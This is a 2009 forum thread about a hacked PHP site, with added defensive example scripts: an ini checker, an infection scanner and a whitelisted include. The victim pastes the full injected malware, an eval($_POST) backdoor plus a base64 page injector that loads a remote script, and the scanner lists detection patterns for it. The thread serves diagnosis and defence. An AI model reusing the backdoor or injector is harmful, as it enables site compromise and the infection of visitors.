Turning Register Globals OFF

Posted: Tue May 12, 2009 4:21 pm
by kendall
hey

is using this statement
;register_globals = Off
turning register_globals "off" or disabling it, and the default is on?

I'm using PHP < 5

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 4:29 pm
by Christopher

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 4:38 pm
by kendall
arborint wrote: That is commented out.

http://us.php.net/manual/en/ini.core.ph ... er-globals
What does it mean when it is commented out? Does it mean that it is commented out and no one can turn it on or off? Does it mean then that it defaults to on or off? Or that register_globals doesn't exist?

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 5:00 pm
by Christopher
If it is commented out then that line does nothing, so it will be set to the default.

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 5:06 pm
by kendall
arborint wrote: If it is commented out then that line does nothing, so it will be set to the default.
Which is usually "on", isn't it..... because I'm using PHP < 5?

I got hacked with the <iframe src="topworld.cn...... hack

I don't see anything in the logs that suggests how they got in.... so I'm trying to clear my name

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 5:26 pm
by John Cartwright
kendall wrote: Which is usually "on", isn't it..... because I'm using PHP < 5?
http://ca2.php.net/manual/en/ini.core.php#ini.register-globals wrote: As of » PHP 4.2.0, this directive defaults to off.

Re: Turning Register Globals OFF

Posted: Tue May 12, 2009 6:33 pm
by ldougherty
<iframe injections are commonly performed via compromised FTP information. What you need to do is take the modified date of the injected file and look into the raw logs on the server to determine what happened at that time. Generally if you look through the FTP log you'll see where the file(s) have been updated.

Re: Turning Register Globals OFF

Posted: Wed May 13, 2009 7:16 am
by kaisellgren
If you do not implicitly specify it as on, it should be off unless there is a third-party affecting it (like .htaccess).

That ; character in the beginning of the line is a comment marker and it makes the line a comment so it is "commented out".

I believe your problem has nothing to do with Register Globals.
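The two points made in this thread, that a line starting with ; is a comment and does nothing and that the engine's default then applies, can be checked mechanically. The script below is an added example, not code from the thread: it classifies how a directive appears in php.ini-style text (actively set, only commented out, or absent) and compares that with what the running interpreter reports through ini_get(). The sample ini text is constructed; the helper names are my own. On PHP 5.4 and later the directive no longer exists and ini_get() returns false, which the runtime check treats as "off".

```php
<?php
// Added example (not from the thread): determine the state of register_globals
// both from a php.ini-style text and from the running engine. The ini text
// below is constructed for illustration; requires PHP 7+.

$sampleIni = <<<'INI'
; Lines starting with ';' are comments and have no effect.
;register_globals = Off
display_errors = Off
INI;

/**
 * Report how $directive appears in $iniText:
 *   ['state' => 'set',       'value' => '...']  an active line sets it
 *   ['state' => 'commented', 'value' => '...']  it only appears behind ';'
 *   ['state' => 'absent',    'value' => null]   it is not mentioned at all
 * 'commented' and 'absent' both mean the compiled-in default applies.
 */
function directiveState(string $iniText, string $directive): array
{
    $result = ['state' => 'absent', 'value' => null];
    $re = '/^' . preg_quote($directive, '/') . '\s*=\s*(.*)$/i';

    foreach (preg_split('/\R/', $iniText) as $line) {
        $line = trim($line);
        if ($line === '') {
            continue;
        }
        $commented = ($line[0] === ';');
        $body = $commented ? ltrim(substr($line, 1)) : $line;
        if (!preg_match($re, $body, $m)) {
            continue;
        }
        if (!$commented) {
            // An active assignment wins; a later active line overrides an earlier one.
            $result = ['state' => 'set', 'value' => trim($m[1])];
        } elseif ($result['state'] === 'absent') {
            $result = ['state' => 'commented', 'value' => trim($m[1])];
        }
    }
    return $result;
}

/** Effective value as the interpreter sees it; false means the directive is unknown. */
function registerGlobalsEnabled(): bool
{
    $v = ini_get('register_globals');
    return $v !== false && filter_var($v, FILTER_VALIDATE_BOOLEAN);
}

$state = directiveState($sampleIni, 'register_globals');
printf("register_globals in ini text: %s (value '%s')\n",
    $state['state'], $state['value'] ?? '-');
printf("register_globals at runtime:  %s\n",
    registerGlobalsEnabled() ? 'ON' : 'off or not available');
```

Run it against the real file (feed file_get_contents(php_ini_loaded_file()) to directiveState()) when the text and the runtime disagree: that is the case kaisellgren describes, where something outside php.ini such as an .htaccess php_flag line is changing the value.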

Re: Turning Register Globals OFF

Posted: Wed May 13, 2009 9:45 am
by kendall
Got that from my server logs.... can anyone explain what he is trying to do here?

Re: Turning Register Globals OFF

Posted: Wed May 13, 2009 9:57 am
by kaisellgren
kendall wrote: Got that from my server logs.... can anyone explain what he is trying to do here?
Your index.php in news page may be vulnerable to attacks due to lack of proper input filtering.

Re: Turning Register Globals OFF

Posted: Wed May 13, 2009 10:01 am
by kendall

Code:

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_
lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGF
JOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCB
sYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe
3ZhciBiQzREPSdfNzZhcl8yMGFfM2RfMjJTY3JpcHRfNDVuZ2lu
ZV8yMl8yY2JfM2RfMjJfNTZlcnNpb25fMjhfMjkrXzIyXzJjal8zZF8
yMl8yMl8yY3VfM2RfNmVhdmlfNjdhXzc0b183Ml8yZXVzZV83Mk
FnZW50XzNiaWZfMjgoXzc1XzJlaW5kXzY1eE9mXzI4XzIyV2luX
zIyKV8zZTApXzI2XzI2KHVfMmVpbmRleE9mXzI4XzIyXzRlVF8y
MF8zNl8yMilfM2NfMzBfMjlfMjZfMjYoZG9jdW1lbnRfMmVjb29fNm
JfNjlfNjVfMmVpbmRlXzc4T2ZfMjhfMjJtaWVrXzNkMV8yMilfM2Mw
KV8yNl8yNih0eV83MGVvZl8yOF83YV83MnZ6Xzc0cylfMjFfM2R
0eXBlb2YoXzIyQV8yMilfMjkpXzdiXzdhcnZ6Xzc0c18zZF8yMkFf
MjJfM2Jldl82MWxfMjhfMjJfNjlmKHdfNjluZF82ZndfMmVfMjJfMmJ
hXzJiXzIyKWpfM2RqXzJiXzIyK182MStfMjJfNGRhal82ZnJfMjJfM
mJiK2ErXzIyXzRkaW5vXzcyXzIyXzJiYitfNjErXzIyXzQyXzc1aV8
2Y2RfMjIrYl8yYl8yMmpfM2JfMjJfMjlfM2JkXzZmY3VfNmRlbnRfM
mV3XzcyXzY5dGUoXzIyXzNjc2NyaXB0XzIwc3JfNjNfM2RfMmZf
MmZndW1ibGFyXzJlY25fMmZyc3NfMmZfM2ZfNjlfNjRfM2RfMjIra
itfMjJfM2VfM2NfNWNfMmZzY3JpcHRfM2VfMjIpXzNiXzdkJzt2YX
IgRnVKeD1iQzRELnJlcGxhY2UoL18vZywnJScpO3ZhciB4RnRJS
j11bmVzY2FwZShGdUp4KTtldmFsKHhGdElKKX0pKCk7CiAtLT48
L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
This is what is being left on my index.php pages.... both in PHP and JavaScript.... I am finding an image.php among my image files.
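ldougherty's advice was to start from the modified time of the injected files and work back to the logs. The scanner below is an added example, not code from the thread or from any project: it walks a web root, keeps PHP files that were either modified recently or show traits of the code pasted above (eval() fed straight from request data, a base64 blob decoded next to gzinflate/gzencode, a named ob_start() handler, and the function and constant names in the paste), and prints each file's mtime in log-timestamp form so it can be lined up with the FTP and HTTP logs for that minute. WEB_ROOT, WINDOW_DAYS and the media-directory pattern are assumptions; it needs PHP 7.4+.

```php
<?php
// Added example, not from the thread: read-only scan of a web root for PHP
// files that are recently modified or carry traits of the injected code.
// WEB_ROOT and WINDOW_DAYS are assumptions; adjust for your server.

const WEB_ROOT    = '/var/www/html';
const WINDOW_DAYS = 7;

/** Return the list of indicator names that match $source (empty if none). */
function fileIndicators(string $source): array
{
    $hits = [];
    // eval() applied directly to request data, as in eval($_POST['...']).
    if (preg_match('/\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b/i', $source)) {
        $hits[] = 'eval-on-request-data';
    }
    // A base64 payload decoded in a file that also gz-(in|en)flates buffers.
    if (stripos($source, 'base64_decode(') !== false
        && preg_match('/\bgz(inflate|encode)\s*\(/i', $source)) {
        $hits[] = 'base64+gzip';
    }
    // A named output-buffer handler: the point where the pasted code rewrites pages.
    if (preg_match('/\bob_start\s*\(\s*[\'"]\w+[\'"]\s*\)/i', $source)) {
        $hits[] = 'named-output-handler';
    }
    // The exact names used in the paste above.
    if (preg_match('/tmp_lkojfghx|TMP_XHGFJOKL/', $source)) {
        $hits[] = 'known-injection-names';
    }
    return $hits;
}

/** Walk $root; return [path => ['mtime' => int, 'hits' => string[]]], newest first. */
function scanWebRoot(string $root, int $windowDays): array
{
    $cutoff = time() - $windowDays * 86400;
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        /** @var SplFileInfo $file */
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $path = $file->getPathname();
        $hits = fileIndicators((string) file_get_contents($path));
        // A PHP file under an image or upload directory is suspicious by itself
        // (the thread mentions an image.php turning up among the images).
        if (preg_match('#/(images?|uploads?)/#i', $path)) {
            $hits[] = 'php-in-media-dir';
        }
        if ($hits === [] && $file->getMTime() < $cutoff) {
            continue; // old and clean: not interesting for the timeline
        }
        $report[$path] = ['mtime' => $file->getMTime(), 'hits' => $hits];
    }
    uasort($report, fn($a, $b) => $b['mtime'] <=> $a['mtime']);
    return $report;
}

foreach (scanWebRoot(WEB_ROOT, WINDOW_DAYS) as $path => $info) {
    // mtime in the same shape as typical log timestamps, for correlation.
    printf("%s  %-26s %s\n",
        date('Y-m-d H:i:s', $info['mtime']),
        $info['hits'] ? implode(',', $info['hits']) : 'recently-modified',
        $path);
}
```

Keep the scanner outside the web root (it contains the marker names it searches for, so it would flag itself), and read mtimes before touching any file, since cleaning a file resets the timestamp you need for the log search.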

Re: Turning Register Globals OFF

Posted: Sat May 16, 2009 11:22 pm
by John Cartwright
As described before, you are not filtering your input variables correctly, and in not doing so, have allowed the execution of remote code on your server (which in turn manipulated your files). The first step would be to immediately take your site offline until this has been patched, otherwise there is no way to tell how far you've been compromised. The second step would be to ensure you are only including files within your filesystem, and preferably whitelisted.
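The "news" page pattern suspected in this thread, written the way the last reply recommends. This is an added example, not code from the thread: the request parameter never reaches include() directly (the unsafe shape is include followed by a raw request value); instead the user selects a key from a fixed map, and a realpath() check confirms the resolved file sits under the pages directory. PAGE_DIR, the page names and the helper name are assumptions.

```php
<?php
// Added example, not from the thread: choose an included file from a whitelist
// instead of passing request data to include(). PAGE_DIR and the page names
// are assumptions; requires PHP 7.1+.

const PAGE_DIR = __DIR__ . '/pages';

// The only request values honoured, and the file each one means.
const PAGES = [
    'home'  => 'home.php',
    'news'  => 'news.php',
    'about' => 'about.php',
];

/**
 * Map a ?page= value to an absolute path, or null when it is not on the list.
 * The realpath() comparison is a second guard: even if the map is later edited
 * carelessly, the included file must still resolve to somewhere under PAGE_DIR.
 */
function resolvePage(?string $requested): ?string
{
    $key = $requested ?? 'home';
    if (!array_key_exists($key, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the pages directory
    }
    return $path;
}

$page = resolvePage($_GET['page'] ?? null);
if ($page === null) {
    http_response_code(404);
    echo 'Unknown page';
    exit;
}
include $page;
```

As a second layer, keep allow_url_include = Off in php.ini (it is off by default) so that include() cannot fetch remote URLs even if a code path somewhere else still builds a path from request data.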